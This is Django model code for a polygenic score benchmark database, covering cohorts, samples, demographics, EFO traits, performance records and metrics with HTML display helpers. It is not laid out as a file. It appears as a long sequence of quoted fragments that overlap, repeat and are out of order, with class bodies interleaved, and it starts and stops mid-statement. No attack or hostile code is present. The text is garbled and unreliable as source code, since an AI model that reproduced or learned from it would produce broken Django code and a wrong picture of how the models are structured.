return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring", "categories_data = '' # if len(category_labels) > 0: # categories_data = ', '.join(category_labels)", "None def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {}", "') # else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: #", "cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full =", "%s'%(self.name, s) def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci)", "#source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed", "count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance", "sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">,", "models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s |", "#source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort,", "self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return", "= self.category_labels_list # categories_data = '' # if len(category_labels) > 0: # categories_data", "French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry", "'{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name,", "== 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) >", "= self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0],", "self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value':", "| %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def", "of Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label", "verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short)", "of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\")", "return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s = '{}", "max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort", "= models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class", "('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric',", "vocabulary (mainly to link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology", "else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in", "display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data", "self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None", "followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100)", "PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)])", "Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe", "if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return", "(type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr), open", "label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model):", "return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self):", "or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional", "return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value", "'' # if len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return", "sstring = '' if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases", "# Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases =", "class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def", "@property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a", "= [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type", "return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR',", "models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code", "sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases,", "[ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type =", "{}' no_helptip = '{} : {} {}' # Estimate e = '' if", "type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in", "if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used", "display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">:", "else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label)", "in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self,", "class to hold information related to controlled trait vocabulary (mainly to link multiple", "phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label)", "self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property", "def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the diverse metric", "if len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return categories_data #@property", "bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for", "div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases = ''", "effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se", "= [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{}", "[] # for category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels)", "to hold information related to controlled trait vocabulary (mainly to link multiple EFO", "sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return", "def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s", "to describe Sample fields (sample_age, followup_time) that can be point estimates or distributions\"\"\"", "else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l)", "effect', null=True) def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci)", "else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else:", "display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free)", "class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list:", "null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g.", "l = [] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value()))", "None: l.append(v) # Range r = None if '[' not in e: if", "if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): #", "class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for", "DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval", "= models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci != None:", "score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label',", "class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if", "= models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range", "metric type, name, value and confidence intervals of a performance metric\"\"\" performance =", "no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l) == 1): return", "type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r", "DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def", "settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class", "str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r)", "filtering directly on the queryset metrics = self.performance_metric.all() if metrics: l = []", "verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry", "class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels':", "= '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return (self.name, self.name)", "models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url =", "self.category_labels_list # categories_data = '' # if len(category_labels) > 0: # categories_data =", "#print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] =", "hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit !=", "self.synonyms: # return self.synonyms.split(' | ') # else: # return [] #@property #def", "sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait", "' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) #", "hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return", "self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(),", "style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe", "to hold metric type, name, value and confidence intervals of a performance metric\"\"\"", "type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v", "from django.db import models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator", "= [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes']", "'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class", "[x.label for x in categories] # else: # return [] #@property #def category_labels(self):", "range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g.", "and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance", "{}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number)", "for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if", "key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list # if len(categories)", "sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls", "if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range),", "class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring +=", "{} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in", "metrics for a PGS and a set of samples\"\"\" # Links to related", "models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self):", "max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts", "self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data =", "None and '[' not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability", "for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort',", "max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort", "= None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v =", "l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' }", "category_labels_list(self): # categories = self.category_list # if len(categories) > 0: # return [x.label", "= othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and", "uses less SQL queries than filtering directly on the queryset metrics = self.performance_metric.all()", "format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if", "max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment',", "y.label) #@property #def category_labels_list(self): # categories = self.category_list # if len(categories) > 0:", "if self.synonyms: # return self.synonyms.split(' | ') # else: # return [] #@property", "'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()]", "ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used", "if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click", "= models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\"", "return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip = '<span", "othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\"", "#for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad)", "models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def", "= self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0],", "sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring +=", "None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>'", "unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci =", "django.db import models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from", "#@property #def category_labels_list(self): # categories = self.category_list # if len(categories) > 0: #", "'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric')", "return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property", "confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric", "'%s | %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property", "the International Classification of Diseases used in PGS \"\"\" id = models.CharField('Code ID',", "in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'):", "= models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class", "details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span", "phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time =", "models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True)", "Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female')", "self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability,", "None def format_range(self): if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type,", "s) def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else:", "models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex", "related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta:", "else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split('", "' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability", "for x in categories] # else: # return [] #@property #def category_labels(self): #", "'%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property", "class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all()", "variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number", "'+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples',", "Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20,", "from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of", "= '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}'", "models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number", "categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories =", "return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data", "s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return", "in e: if self.range != None: type_desc = self.range_type_desc() if (type_desc): r =", "self.unit != None: l['unit'] = self.unit return l def range_type_desc(self): desc_list = {", "'{} : {} {}' # Estimate e = '' if self.estimate != None:", "None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None: return", "multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True)", "to link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID',", "variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g.", "if self.unit != None: l['unit'] = self.unit return l def range_type_desc(self): desc_list =", "self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate ==", "if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard", "l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability #", "categories = self.category_list # categories_data = '' # if len(categories) > 0: #", "0: # category_labels = [] # for category in categories: # v_spacing =", "def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by", "ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional", "name, value and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE,", "'ancestries'] data = {} for type in data_types: data[type] = set() #for bm_performance", "return [] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data = ''", "self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = []", "(type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit)", "return self.synonyms.split(' | ') # else: # return [] #@property #def mapped_terms_list(self): #", "type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex", "sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring", "django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases", "return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics", "'[' not in e: if self.range != None: type_desc = self.range_type_desc() if (type_desc):", "'{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else:", "self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics", "Range r = None if '[' not in e: if self.range != None:", "# Estimate e = '' if self.estimate != None: e += '{} :", "#return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property", "r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if", "sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) #", "!= None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None:", "samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name',", "# return [] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data =", "None if '[' not in e: if self.range != None: type_desc = self.range_type_desc()", "!= None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit)", "= False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of", "and format the diverse metric data\"\"\" # Using all and filter afterward uses", "[] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') #", "and a set of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic", "self.category_list # if len(categories) > 0: # return [x.label for x in categories]", "(%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci", "id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div", "if '[' not in e: if self.range != None: type_desc = self.range_type_desc() if", "data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in data_types:", "(ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type", "desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation',", "1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def", "return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy", "# if len(categories) > 0: # return [x.label for x in categories] #", "'samples', 'ancestries'] data = {} for type in data_types: data[type] = set() #for", "not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id)", "import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used", "self.range != None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e +=", "estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit',", "models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self):", "[] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] =", "method to extract and format the diverse metric data\"\"\" # Using all and", "percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None def", "the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring +=", "if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self,", "estimate = '' if self.estimate != None: estimate = str(self.estimate) if self.range !=", "= ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age,", "used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort,", "= {} # Estimate estimate = '' if self.estimate != None: estimate =", "max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10)", ": {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci': e +=", "othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def", "error of the effect', null=True) def __str__(self): if self.ci != None: s =", "+= '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>'", "helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r !=", "Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description =", "v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range r", "percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide", "max_length=100, default='se') # e.g. standard deviation (sd), standard error (se) def format_estimate(self): if", "return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num'", "%s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self):", "models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci != None: s", "= models.TextField('Country of Recruitment', 